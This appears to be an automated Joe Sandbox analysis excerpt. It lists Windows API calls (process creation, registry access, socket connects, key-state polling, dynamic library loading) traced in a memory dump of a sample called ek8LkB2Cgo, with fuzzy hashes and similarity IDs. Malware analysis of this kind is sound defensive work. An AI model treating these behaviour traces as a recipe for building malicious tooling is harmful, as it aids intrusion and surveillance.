  • Part of subcall function 00517CF4: EnterCriticalSection.KERNEL32(00000000,?,00517ADD,0000000D), ref: 00517D1F
• InterlockedIncrement.KERNEL32(?), ref: 00517AE5
• __lock.LIBCMT ref: 00517AF9
• ___addlocaleref.LIBCMT ref: 00517B17
Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                  • String ID: `W
                                                                                  • API String ID: 1687444384-3144318129
                                                                                  • Opcode ID: 666e0223005b2883258d15c2aa833973296cd051350199738e7c6cc41f8567c5
                                                                                  • Instruction ID: 89dfbdde21176ef649a4f364ea6a7f0409246cb7fec3db20d6609a701ec9b470
                                                                                  • Opcode Fuzzy Hash: 666e0223005b2883258d15c2aa833973296cd051350199738e7c6cc41f8567c5
                                                                                  • Instruction Fuzzy Hash: 48015B71404B059EE7209F69D90A78ABBF0FF94325F20890EA49A972A0DB74A684CB51
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0055E33D
                                                                                  • _memset.LIBCMT ref: 0055E34C
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005B3D00,005B3D44), ref: 0055E37B
                                                                                  • CloseHandle.KERNEL32 ref: 0055E38D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                  • String ID: D=[
                                                                                  • API String ID: 3277943733-511917260
                                                                                  • Opcode ID: 19bebcdd23aa2aa16ba5d38cd712ef2595c687ab4715f72e005f1d978a1b3864
                                                                                  • Instruction ID: 6bd58ee1367a379b5a6c6829ce01943193fe6bce6e26e63515205a692a1d5034
                                                                                  • Opcode Fuzzy Hash: 19bebcdd23aa2aa16ba5d38cd712ef2595c687ab4715f72e005f1d978a1b3864
                                                                                  • Instruction Fuzzy Hash: 25F054F15403047EF3501B60AC55FB77E6CEB14794F004921BE08EA1A2D3756E4466B4
                                                                                  APIs
                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005519F3
                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00551A26
                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00551B49
                                                                                  • CloseHandle.KERNEL32(?), ref: 00551BBF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                  • String ID:
                                                                                  • API String ID: 2364364464-0
                                                                                  • Opcode ID: 8491b73b7ee4af0665f38b9d50d9bda877bdc6e70b96bafb27ea44886c39a4fa
                                                                                  • Instruction ID: ea14539da0d3e69348c7acd7e9c3bfbf935dfaeb92d48979b00b641ebbfb0f5b
                                                                                  • Opcode Fuzzy Hash: 8491b73b7ee4af0665f38b9d50d9bda877bdc6e70b96bafb27ea44886c39a4fa
                                                                                  • Instruction Fuzzy Hash: 5F818E70600205ABDF10AF64C89ABADBFF5BF48720F14845AF905AF3C2D7B4AD458B95
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0055E1D5
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0055E20D
                                                                                  • IsDlgButtonChecked.USER32(?,00000001), ref: 0055E248
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0055E269
                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0055E281
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3188977179-0
                                                                                  • Opcode ID: 3b118d613e5227c22350d1ece7158532a2251d6d0069141326758f6964f111fe
                                                                                  • Instruction ID: 8e0d5edcb37858d041117d8a850e821cba7a4588aafccaa89fbf462e0f861e85
                                                                                  • Opcode Fuzzy Hash: 3b118d613e5227c22350d1ece7158532a2251d6d0069141326758f6964f111fe
                                                                                  • Instruction Fuzzy Hash: 8C61A534600604AFDB28CF54C866FBA7FBAFF89301F14405AFD599B2A1C771AA48DB50
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 00531CB4
                                                                                  • VariantClear.OLEAUT32(00000013), ref: 00531D26
                                                                                  • VariantClear.OLEAUT32(00000000), ref: 00531D81
                                                                                  • VariantClear.OLEAUT32(?), ref: 00531DF8
                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00531E26
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                                  • String ID:
                                                                                  • API String ID: 4136290138-0
                                                                                  • Opcode ID: 2029499f59ddff632af655e72240836c96f8b3038b9d67b8aa6f7a2cda02f7aa
                                                                                  • Instruction ID: f95f7bb60b57662838780550da97ec01d4b0a8bdc7f56656cd5e13c5213a0e25
                                                                                  • Opcode Fuzzy Hash: 2029499f59ddff632af655e72240836c96f8b3038b9d67b8aa6f7a2cda02f7aa
                                                                                  • Instruction Fuzzy Hash: A5514AB5A00209AFDB14CF68C880AAABBB9FF4D314F158559E959DB301E730E951CFA4
                                                                                  APIs
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 005506EE
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0055077D
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0055079B
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 005507E1
                                                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 005507FB
                                                                                    • Part of subcall function 0050E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0053A574,?,?,00000000,00000008), ref: 0050E675
                                                                                    • Part of subcall function 0050E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0053A574,?,?,00000000,00000008), ref: 0050E699
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 327935632-0
                                                                                  • Opcode ID: 49b079f1414a3d9b55a30dd1abdc5d14ff8bf1676cc7468025c49c9a42b13aad
                                                                                  • Instruction ID: c745f050c289add53d832bc4a713d598639f9418eb2bc4feb7c042b7372b2476
                                                                                  • Opcode Fuzzy Hash: 49b079f1414a3d9b55a30dd1abdc5d14ff8bf1676cc7468025c49c9a42b13aad
                                                                                  • Instruction Fuzzy Hash: 1B517B75A00209DFCB00EFA8D495DADBBB5FF58314B14805AEA05AB392DB34ED49CF94
                                                                                  APIs
                                                                                    • Part of subcall function 00553C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00552BB5,?,?), ref: 00553C1D
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00552EEF
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00552F2E
                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00552F75
                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00552FA1
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00552FAE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                  • String ID:
                                                                                  • API String ID: 3740051246-0
                                                                                  • Opcode ID: 04ffa802f9ded7c75465e696096cea8e0d5d38241b60a0bf0458284e9554f4aa
                                                                                  • Instruction ID: b98f273dd1b81d69e7435fa3eee027d72d2fb0d8853277959eb5216bb3881766
                                                                                  • Opcode Fuzzy Hash: 04ffa802f9ded7c75465e696096cea8e0d5d38241b60a0bf0458284e9554f4aa
                                                                                  • Instruction Fuzzy Hash: 57515D71208208AFD704EF54D896E6EBBF9FF88304F00485EF95597291DB34E908DB52
                                                                                  APIs
                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 005412B4
                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 005412DD
                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0054131C
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00541341
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00541349
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1389676194-0
                                                                                  • Opcode ID: 1fab9e10f2f88a02e88f214fe6d38057978c90fd1690a29d3c0b264db231f7d3
                                                                                  • Instruction ID: 5644fa28d69cc894ea34262e82b15d81a857590e33a5b63e7bbd596234e8e911
                                                                                  • Opcode Fuzzy Hash: 1fab9e10f2f88a02e88f214fe6d38057978c90fd1690a29d3c0b264db231f7d3
                                                                                  • Instruction Fuzzy Hash: EC413B35A00509DFCF01EF65C985AAEBBF5FF48314B148099E90AAB3A2CB35ED41DB54
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(000000FF), ref: 0050B64F
                                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 0050B66C
                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 0050B691
                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 0050B69F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                  • String ID:
                                                                                  • API String ID: 4210589936-0
                                                                                  • Opcode ID: bd7eb03bb8307f24e6898b136cd3b95b8c4a84a51af96fec24045bdaeb9f9bef
                                                                                  • Instruction ID: 239ff4a9b1ff6e8e1bfa63ea954921d44183ee89d297a4ce947cce3c46bbb85d
                                                                                  • Opcode Fuzzy Hash: bd7eb03bb8307f24e6898b136cd3b95b8c4a84a51af96fec24045bdaeb9f9bef
                                                                                  • Instruction Fuzzy Hash: A9413035A04115BBDF159F64C888AEDFF74BF45324F10471AE829A72D0CB31A994EFA1
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(?,?), ref: 0052B369
                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 0052B413
                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0052B41B
                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 0052B429
                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0052B431
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: eca4b367ced71f59c01e53c0b4cd19bd5797d17debd728ccb84178c94824a657
• Instruction ID: 178272508c8ba43b5208e3ace5c3105094ff50123b8d510370a7e1fd428883d6
• Opcode Fuzzy Hash: eca4b367ced71f59c01e53c0b4cd19bd5797d17debd728ccb84178c94824a657
• Instruction Fuzzy Hash: 1031AD71900229EBEF04CF68E989A9E3BB5FF15325F104629F825A61D1C3B09954DB90
APIs
• IsWindowVisible.USER32(?), ref: 0052DBD7
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0052DBF4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0052DC2C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0052DC52
• _wcsstr.LIBCMT ref: 0052DC5C
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
• Opcode ID: 8b0123f005657d3be16551dd13d0f11f857b14a0f9a1a809170312af3124dbb7
• Instruction ID: 529f67d9976eb2c3da5f3f10879bda9b7b495e41047443fce1d62facaef1dd41
• Opcode Fuzzy Hash: 8b0123f005657d3be16551dd13d0f11f857b14a0f9a1a809170312af3124dbb7
• Instruction Fuzzy Hash: 6021C871204114ABEB155F35AC49E7F7FB8FF46760F104029F809EA1D1DAA1DC41A7B0
APIs
  • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
• GetWindowLongW.USER32(?,000000F0), ref: 0055DEB0
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0055DED4
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0055DEEC
• GetSystemMetrics.USER32(00000004), ref: 0055DF14
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00543A1E,00000000), ref: 0055DF32
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
• Opcode ID: c281f47887277f85cd26f486f220e3737f6d23b4d4ba06db0c890251816c9975
• Instruction ID: 8fb8713f82b7b327f4a59061df03c1fa5979de57981dd128fc6e97180367bde2
• Opcode Fuzzy Hash: c281f47887277f85cd26f486f220e3737f6d23b4d4ba06db0c890251816c9975
• Instruction Fuzzy Hash: 7321E5726102129FCB304F78DC58B6A7BB8FF25326F150726BC26CA5E0D7309858D7A0
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0052BC90
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0052BCC2
• __itow.LIBCMT ref: 0052BCDA
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0052BD00
• __itow.LIBCMT ref: 0052BD11
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: ade47c51558875b45ead8956d332288818681f0a2b8ad1ceb68c339932b99ca8
• Instruction ID: 818f676ad02499849a810723a3b85eb51c4c42999bc4ba9b97d8c75c75e86197
• Opcode Fuzzy Hash: ade47c51558875b45ead8956d332288818681f0a2b8ad1ceb68c339932b99ca8
• Instruction Fuzzy Hash: 6021C635A006287BEB10AA65AC4AFDE7F79BF9B710F000025FA05FB1C1DB708D4597A1
APIs
  • Part of subcall function 004F50E6: _wcsncpy.LIBCMT ref: 004F50FA
• GetFileAttributesW.KERNEL32(?,?,?,?,005360C3), ref: 00536369
• GetLastError.KERNEL32(?,?,?,005360C3), ref: 00536374
• CreateDirectoryW.KERNEL32(?,00000000,?,?,?,005360C3), ref: 00536388
• _wcsrchr.LIBCMT ref: 005363AA
  • Part of subcall function 00536318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,005360C3), ref: 005363E0
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
• String ID:
• API String ID: 3633006590-0
• Opcode ID: c7ff2a2c450cfa10f2c1db289d5855dd677b5e7345866b75b0893ad23c822a3e
• Instruction ID: e66ee1237850b7a700816844f7f6046882267cae9fbef768690b85e79132c3d5
• Opcode Fuzzy Hash: c7ff2a2c450cfa10f2c1db289d5855dd677b5e7345866b75b0893ad23c822a3e
• Instruction Fuzzy Hash: B12108315042166BEB25AB78AC46FEE2BBCFF153A0F10886DF005D70C1EB60D9C59A65
APIs
  • Part of subcall function 0054A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0054A84E
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00548BD3
• WSAGetLastError.WSOCK32(00000000), ref: 00548BE2
• connect.WSOCK32(00000000,?,00000010), ref: 00548BFE
Similarity
• API ID: ErrorLastconnectinet_addrsocket
• String ID:
• API String ID: 3701255441-0
• Opcode ID: 9dd965f1728f6081819841a63e695690b358661a85c6a4e2aa2b32cea4e15120
• Instruction ID: c0f46969fd6a83f0341751f06184a8a7d7a1d79793edc7216e03077eef4d1c9e
• Opcode Fuzzy Hash: 9dd965f1728f6081819841a63e695690b358661a85c6a4e2aa2b32cea4e15120
• Instruction Fuzzy Hash: F121C0312002159FDB14AF28DC89FBE7BB9FF98714F044459F906AB2D2CB74AC469B61
APIs
• IsWindow.USER32(00000000), ref: 00548441
• GetForegroundWindow.USER32 ref: 00548458
• GetDC.USER32(00000000), ref: 00548494
• GetPixel.GDI32(00000000,?,00000003), ref: 005484A0
• ReleaseDC.USER32(00000000,00000003), ref: 005484DB
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: 40c7f7d74ea3892845095342f5b1d33436c28f7b565a176385d2313030f2f555
• Instruction ID: 479841e4838695e89c7c96decdfd9f5ea8aa062a28d073cb57aac79d8dd62bf9
• Opcode Fuzzy Hash: 40c7f7d74ea3892845095342f5b1d33436c28f7b565a176385d2313030f2f555
• Instruction Fuzzy Hash: 11219975A00205AFDB00DF64DC89AAEBBF5FF48305F048479E959D7251DB70AD44DB60
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0050AFE3
• SelectObject.GDI32(?,00000000), ref: 0050AFF2
• BeginPath.GDI32(?), ref: 0050B009
• SelectObject.GDI32(?,00000000), ref: 0050B033
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: d4391eddb11054ad33002dc554358bde5d4cede07a771225482c392df3fcf506
• Instruction ID: aa447e59d64e0ba5e5123e9063c1b9df02eb739862858d39f865d311da2eeb1b
• Opcode Fuzzy Hash: d4391eddb11054ad33002dc554358bde5d4cede07a771225482c392df3fcf506
• Instruction Fuzzy Hash: 0521A1B5800705EFDB60DF94ECA87AE7F78BB30395F58431AE424921E0D3706889EB58
APIs
• __calloc_crt.LIBCMT ref: 005121A9
• CreateThread.KERNEL32(?,?,005122DF,00000000,?,?), ref: 005121ED
• GetLastError.KERNEL32 ref: 005121F7
• _free.LIBCMT ref: 00512200
• __dosmaperr.LIBCMT ref: 0051220B
  • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
Similarity
• API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
• String ID:
• API String ID: 2664167353-0
• Opcode ID: acd0db341af9205f393896309664c38a345a2e86ce6ab8ec9256116c2616d8ca
• Instruction ID: ef0591f62043062d3be74ab592b39fc8ddb6c22b8cfe54a1208f3b714288851d
• Opcode Fuzzy Hash: acd0db341af9205f393896309664c38a345a2e86ce6ab8ec9256116c2616d8ca
• Instruction Fuzzy Hash: 1211E53610470B6FBB11AF699C45DDF3FA8FF44760F100529F92486141EB3188E19AA0
APIs
• GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0052ABD7
• GetLastError.KERNEL32(?,0052A69F,?,?,?), ref: 0052ABE1
• GetProcessHeap.KERNEL32(00000008,?,?,0052A69F,?,?,?), ref: 0052ABF0
• HeapAlloc.KERNEL32(00000000,?,0052A69F,?,?,?), ref: 0052ABF7
• GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0052AC0E
                                                                                  Similarity
                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 842720411-0
                                                                                  • Opcode ID: 4927427605308070d7b5c5400035f10c9d29ede7ac33465db768eca7071a618b
                                                                                  • Instruction ID: 1ac9b530a52075d51144fd2d33064e055bcc6a9651a040f95236c3701ef004b8
                                                                                  • Opcode Fuzzy Hash: 4927427605308070d7b5c5400035f10c9d29ede7ac33465db768eca7071a618b
                                                                                  • Instruction Fuzzy Hash: 0201F671210214BFDB104FA9EC48DAB3EBDFF8A7557100429F949D62A0DA719C84EA71
                                                                                  APIs
                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00537A74
                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00537A82
                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00537A8A
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00537A94
                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00537AD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                  • String ID:
                                                                                  • API String ID: 2833360925-0
                                                                                  • Opcode ID: e7b339fb92cfc1a29b1dfde01e87f6ec086ed85e98eb3ff4c19dabd2f9e1b7c9
                                                                                  • Instruction ID: 54d732dfe0cbc8d77fb7298f1a124554006ff07913180189176cb8500225f244
                                                                                  • Opcode Fuzzy Hash: e7b339fb92cfc1a29b1dfde01e87f6ec086ed85e98eb3ff4c19dabd2f9e1b7c9
                                                                                  • Instruction Fuzzy Hash: DE0132B1C0862DEBCF10ABA4EC48AEDBB78FF1C311F440445E402B2250DB309698EBA1
                                                                                  APIs
                                                                                  • CLSIDFromProgID.OLE32 ref: 00529ADC
